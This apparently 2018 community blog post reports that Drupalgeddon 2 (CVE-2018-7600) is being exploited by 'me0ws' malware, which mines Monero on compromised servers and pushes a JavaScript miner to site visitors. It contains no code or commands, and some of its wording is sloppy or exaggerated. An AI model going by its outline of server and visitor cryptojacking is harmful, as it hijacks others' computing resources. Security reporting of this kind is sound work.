Drupal exploit "me0ws" spreads Monero malware to site visitors

Submitted by dryer on Fri, 05/04/2018 - 19:04
Cat vs. Drupal

A month after the Critical vunerability dubbed Drupalgeddon 2 hit, the expoit is now being actively exploited. Malicious attackers are using botnets to exploit Drupal at scale, most of which no longer deface the site or make their presence known at all.

Instead cracked Drupal installations are using worm like malware to take control of the server, or cluster of servers running Drupal. This allows the attackers to use the popular CMS as an attack tool, to make profit indirectly.

But now a more common technique of mining cryptocurrencies with dozens of insecure penetrated installations connected to the Internet 24/7 with reliable power, networking - and possibly thousands of visitors a day.

This is exactly what a new exploit is doing. The "me0ws" malware sneaks in to a Drupalgeddon 2 (SA-CORE-2018-002/CVE-2018-7600) vulnerable Drupal installation and starts spreading to any visitors.

The malware builds on the Kitty that is a sophisticated Monero cryptocurrency miner. Once the worm has penetrated the machine it sets up a cronjob to make sure it is running.

In addition to using the server itself, "me0ws" starts pushing out a JavaScript based miner to all visitors on the site. This will allow the attacker to tap into the CPU resources of the server, but also the CPU/GPU resources of any unsuspecting visitor on the site.

This is an evil genius attack, that will likely simply run until the end of time since neither visitors or administrators of a site will be aware that a Drupal exploit has compromised their systems.

More indepth information on the Drupal exploit on the Incapsula blog: Crypto Me0wing Attacks: Kitty Cashes in on Monero